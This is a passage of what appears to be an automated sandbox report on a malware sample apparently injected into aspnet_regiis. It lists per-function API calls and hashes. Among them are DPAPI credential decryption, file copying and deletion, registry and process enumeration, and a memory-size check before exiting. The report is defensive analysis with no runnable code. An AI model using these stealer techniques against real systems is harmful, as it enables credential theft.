lstrcat.KERNEL32(?,00000000), ref: 02761E17
lstrcat.KERNEL32(?,02BB6388), ref: 02761E2B

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 977a94df591a1e4e95ff3291f09b3379fedcc1af74b664c2197d265b2a2623b9
Instruction ID: 46793b1e1f6a2d61a08e6e5b29fc70d149ff74860b716424116651c58854b806
Opcode Fuzzy Hash: 977a94df591a1e4e95ff3291f09b3379fedcc1af74b664c2197d265b2a2623b9
Instruction Fuzzy Hash: D04184B2D4411CABCB15EBE0DC5DFFA733EAB88741F44494CEA1D96180FAB056588FA1

Function 027593A0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027593CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 027593F1
LocalAlloc.KERNEL32(00000040,?), ref: 02759411
ReadFile.KERNEL32(000000FF,?,00000000,0275EB27,00000000), ref: 0275943A
LocalFree.KERNEL32(0275EB27), ref: 02759470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0275947A

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: 02cfe33a90f271226134a6e5e41ccdb430cd103f538f4329e06c469584b138b1
Instruction ID: 456b68cb88513dedf643ef6a8de119cff0720ef55995dda59bddeae4fe513ed5
Opcode Fuzzy Hash: 02cfe33a90f271226134a6e5e41ccdb430cd103f538f4329e06c469584b138b1
Instruction Fuzzy Hash: 8D310AB4E00219EFDB14CFA4C889BAFB7B5BF48714F108158ED15A7280D7B4A995CFA1

Function 027623F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,02BB60A0), ref: 0276244B

Part of subcall function 027654D0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 027654FB

lstrcat.KERNEL32(?,00000000), ref: 02762471
lstrcat.KERNEL32(?,?), ref: 02762490
lstrcat.KERNEL32(?,?), ref: 027624A4
lstrcat.KERNEL32(?,02BB0458), ref: 027624B7
lstrcat.KERNEL32(?,?), ref: 027624CB
lstrcat.KERNEL32(?,02BB55F0), ref: 027624DF

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02765480: GetFileAttributesA.KERNEL32(00000000,?,0275E9F4,?,00000000,?,00000000,0276D76E,0276D76B), ref: 0276548F

Part of subcall function 027621F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02762200
Part of subcall function 027621F0: RtlAllocateHeap.NTDLL(00000000), ref: 02762207
Part of subcall function 027621F0: wsprintfA.USER32 ref: 02762223
Part of subcall function 027621F0: FindFirstFileA.KERNEL32(?,?), ref: 0276223A

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: a479181287a3ffa071475679f93c6fcb63865d302274c610eaf07ad7639d8d42
Instruction ID: ccbb844e0542967edaa7323f43f093cb004526b18f1fe27a2f5f9b2e5845fd0b
Opcode Fuzzy Hash: a479181287a3ffa071475679f93c6fcb63865d302274c610eaf07ad7639d8d42
Instruction Fuzzy Hash: FE3132B6E4421C67CB15EBB0DC9CFF9737DAB58700F844999AB09A6040EA749788CF94

Function 027511E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 027511FE
__aulldiv.LIBCMT ref: 02751218
__aulldiv.LIBCMT ref: 02751226
ExitProcess.KERNEL32 ref: 02751254

Strings

@, xrefs: 027511F3

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 4d974f68b498db989a69ec66a03d5897c69ea60fba0179a9fd85adaa521b376c
Instruction ID: 9a63d4830a14316fa0429197ece912d28b1b5f92d9932e3e153e39ee74a41c68
Opcode Fuzzy Hash: 4d974f68b498db989a69ec66a03d5897c69ea60fba0179a9fd85adaa521b376c
Instruction Fuzzy Hash: 740112B0E44308FBDB10DBE0CC59B9EBBB8AF44706F504454EB08BA1C1D7B455458F55

Function 6C2BC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C2BC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C2BC969
GetSystemInfo.KERNEL32(?), ref: 6C2BC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C2BC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C2BC9E2

Memory Dump Source

Source File: 00000002.00000002.1824225528.000000006C2A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000002.00000002.1824205065.000000006C2A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824379859.000000006C32E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1824411954.000000006C332000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c2a0000_aspnet_regiis.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 39119f362e7cd88d5a56daa54a1e23ff46c4f4654310faecf9c85c7399496049
Instruction ID: 5279336c15d4eb2a2da03c648a20f83ff401e9bed4229f745691972cb3961efb
Opcode Fuzzy Hash: 39119f362e7cd88d5a56daa54a1e23ff46c4f4654310faecf9c85c7399496049
Instruction Fuzzy Hash: 3E21D73174161CABEF14EA24DC84BBE73BDAB4AB49F50052EFD43B7A40DB74680487A0

Function 02751260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 02751274
RtlAllocateHeap.NTDLL(00000000), ref: 0275127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 02751297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 027512B5
RegCloseKey.ADVAPI32(?), ref: 027512BF

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 469ec8d2f3f2e4c2ffc7c93541155a3d7eb1d333634fa41317a68a57f7fc7597
Instruction ID: 5ae4834c5677ee8245d9bbf9d575bfccd438dd11ac1ccd6fb69cf5855c4ce562
Opcode Fuzzy Hash: 469ec8d2f3f2e4c2ffc7c93541155a3d7eb1d333634fa41317a68a57f7fc7597
Instruction Fuzzy Hash: 0F011D79E84208BFDB00DFE0D849FAEB778BB48701F408554FA09D7280D770AA148B90

Function 027642F0 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02764304
RtlAllocateHeap.NTDLL(00000000), ref: 0276430B
RegOpenKeyExA.KERNEL32(80000002,02BB1010,00000000,00020119,00000000), ref: 0276432B
RegQueryValueExA.KERNEL32(00000000,02BB5D88,00000000,00000000,000000FF,000000FF), ref: 0276434C
RegCloseKey.ADVAPI32(00000000), ref: 02764356

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 5dbb13ffbb7552af7a32cddac4d618b71323f0c952650350d8c84db4e8c611a9
Instruction ID: dd18489c1375156f81f9f33c322d6c376640a2d10e5c5162de46a7311aff7a54
Opcode Fuzzy Hash: 5dbb13ffbb7552af7a32cddac4d618b71323f0c952650350d8c84db4e8c611a9
Instruction Fuzzy Hash: 5901E175E84208BFDB10DBE4E949FBEB77CEB48701F104954FA05A7281D77069188B94

Function 02764730 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02764744
RtlAllocateHeap.NTDLL(00000000), ref: 0276474B
RegOpenKeyExA.KERNEL32(80000002,02BB1470,00000000,00020119,00000000), ref: 0276476B
RegQueryValueExA.KERNEL32(00000000,02BB55D0,00000000,00000000,000000FF,000000FF), ref: 0276478C
RegCloseKey.ADVAPI32(00000000), ref: 02764796

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: fafb2abd6660db79a66dce03e40aa2e057f1cd56a6b8765836d96fb68bcfe3d9
Instruction ID: b84de5fa55248f3e39ad001c2733e9422df9d8e9506995b247656b5db8c25a5c
Opcode Fuzzy Hash: fafb2abd6660db79a66dce03e40aa2e057f1cd56a6b8765836d96fb68bcfe3d9
Instruction Fuzzy Hash: A001E175E84208FFD710DBE4EC49FBEB778FB48705F104959FA0596281D77059288B90

Function 02759970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(02BB5A78,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0275EA16), ref: 0275998D
LoadLibraryA.KERNEL32(02BB5310,?,?,?,?,?,?,?,?,?,?,?,0275EA16), ref: 02759A16

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766E10: lstrlen.KERNEL32(00000000,?,?,02762BE0,0276D59B,0276D59A,?,?,027637C6,00000000,?,02BA0578,?,0276D8AC,?,00000000), ref: 02766E1B
Part of subcall function 02766E10: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766E75

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

SetEnvironmentVariableA.KERNEL32(02BB5A78,00000000,00000000,?,0276DA4C,?,0275EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0276D6EF), ref: 02759A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 02759982, 02759996, 027599AC

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 5306808d74031a03e07c3ead44761255bcfb363dac3aa16e4901c2f576e3be13
Instruction ID: deac76520e60972454fbf704c0411dfd53038bff03363817b31bf68b3c9da83b
Opcode Fuzzy Hash: 5306808d74031a03e07c3ead44761255bcfb363dac3aa16e4901c2f576e3be13
Instruction Fuzzy Hash: 784192B5D88110DFDB05DFA4E88DABA73B9BF44315F44582CE90193282DBB49D28CFA1

Function 02759B30 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02765250: GetSystemTime.KERNEL32(?,02BA97F0,0276D129,?,?,?,?,?,?,?,?,?,02754623,?,00000014), ref: 02765276

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02759BB1
lstrlen.KERNEL32(00000000), ref: 02759F6A

Part of subcall function 027597F0: memcmp.MSVCRT ref: 0275980B
Part of subcall function 027597F0: memset.MSVCRT ref: 0275983E
Part of subcall function 027597F0: LocalAlloc.KERNEL32(00000040,?), ref: 0275988E

lstrlen.KERNEL32(00000000,00000000), ref: 02759CAD
DeleteFileA.KERNEL32(00000000), ref: 02759FEB

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: 82b0228fb2c80cf49cc81bc2803c4a83b8d56bc4e3fb98a8e07498d867bb7c78
Instruction ID: a03e2fc769a67e70533927d7714a1c995f4625baef50ba04e45a4628ee848078
Opcode Fuzzy Hash: 82b0228fb2c80cf49cc81bc2803c4a83b8d56bc4e3fb98a8e07498d867bb7c78
Instruction Fuzzy Hash: 83D1E0728141189BCB16EBA5DC9CEFEB33EBF14300F944569E91672054EF746A58CFA0

Function 0275CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02765250: GetSystemTime.KERNEL32(?,02BA97F0,0276D129,?,?,?,?,?,?,?,?,?,02754623,?,00000014), ref: 02765276

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0275CF41
lstrlen.KERNEL32(00000000), ref: 0275D0DF
lstrlen.KERNEL32(00000000), ref: 0275D0F3
DeleteFileA.KERNEL32(00000000), ref: 0275D16C

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: f1dc1c035e31081bcd8de7755f86ca3a398a6e845983b3488323b5fb2da49a59
Instruction ID: f608f6dd54fa2cbf0bb8df473444d95a7140a3731fa6837e1b797f97bc3d61ec
Opcode Fuzzy Hash: f1dc1c035e31081bcd8de7755f86ca3a398a6e845983b3488323b5fb2da49a59
Instruction Fuzzy Hash: C081C0729101149BCF1AEBA5DC5CEFEB33EAF54344F844528E90667054EF746A18CFA1

Function 027596C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 027593A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027593CC
Part of subcall function 027593A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 027593F1
Part of subcall function 027593A0: LocalAlloc.KERNEL32(00000040,?), ref: 02759411
Part of subcall function 027593A0: ReadFile.KERNEL32(000000FF,?,00000000,0275EB27,00000000), ref: 0275943A
Part of subcall function 027593A0: LocalFree.KERNEL32(0275EB27), ref: 02759470
Part of subcall function 027593A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0275947A

Part of subcall function 02765520: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02765542

StrStrA.SHLWAPI(00000000,02BB5DD0), ref: 0275971B

Part of subcall function 027594A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02754BAE,00000000,00000000), ref: 027594CF
Part of subcall function 027594A0: LocalAlloc.KERNEL32(00000040,?,?,?,02754BAE,00000000,?), ref: 027594E1
Part of subcall function 027594A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02754BAE,00000000,00000000), ref: 0275950A
Part of subcall function 027594A0: LocalFree.KERNEL32(?,?,?,?,02754BAE,00000000,?), ref: 0275951F

memcmp.MSVCRT ref: 02759774

Part of subcall function 02759540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02759564
Part of subcall function 02759540: LocalAlloc.KERNEL32(00000040,00000000), ref: 02759583
Part of subcall function 02759540: LocalFree.KERNEL32(?), ref: 027595AF

Strings

DPAPI, xrefs: 0275976B
, xrefs: 027597A3

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 45b06b539031f655743faef3decc0e4d438e95f89555e65803c1f7af8cc323b1
Instruction ID: a25df0a7383ac9ae4b150200e90bb3b790a08d34ff074f01f416b22bfeeec4f4
Opcode Fuzzy Hash: 45b06b539031f655743faef3decc0e4d438e95f89555e65803c1f7af8cc323b1
Instruction Fuzzy Hash: DB315EB5D10219EBDF04DFA4DC88AFFB7B9AF48704F444919EE05A3281E7709A14CBA1

Function 02764DD0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02764DF7
Process32First.KERNEL32(00000000,00000128), ref: 02764E0B
Process32Next.KERNEL32(00000000,00000128), ref: 02764E20

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

FindCloseChangeNotification.KERNEL32(00000000), ref: 02764E8E

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

